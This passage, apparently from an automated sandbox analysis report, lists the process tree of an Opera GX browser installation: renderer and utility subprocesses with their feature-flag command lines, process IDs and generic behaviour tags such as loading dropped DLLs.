--with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=3524,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=3676 /prefetch:12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:392
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_gx_splash.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\109.0.5097.98\opera_gx_splash.exe" --instance-name=0603c28fa4a788d681a330bade7a12732⤵
- Executes dropped EXE
PID:3988
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4100,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=4108 /prefetch:12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5312
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4244,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5368
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4456,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=4488 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:872
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4616,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=4628 /prefetch:12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5652
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=4888,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:22⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:3704
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3500,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=5220 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5712
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4440,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4380
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=6088,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6128 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1424
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5952,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6148 /prefetch:22⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:1624
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=6324,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6380 /prefetch:22⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5432
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=6500,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6504 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3740
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=6660,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6696 /prefetch:22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4120
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6928,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:22⤵PID:2528
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5776,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=7284 /prefetch:12⤵PID:4212
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7440,i,15733259208294510133,13206957811348970524,262144 --variations-seed-version --mojo-platform-channel-handle=7464 /prefetch:82⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1840
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on 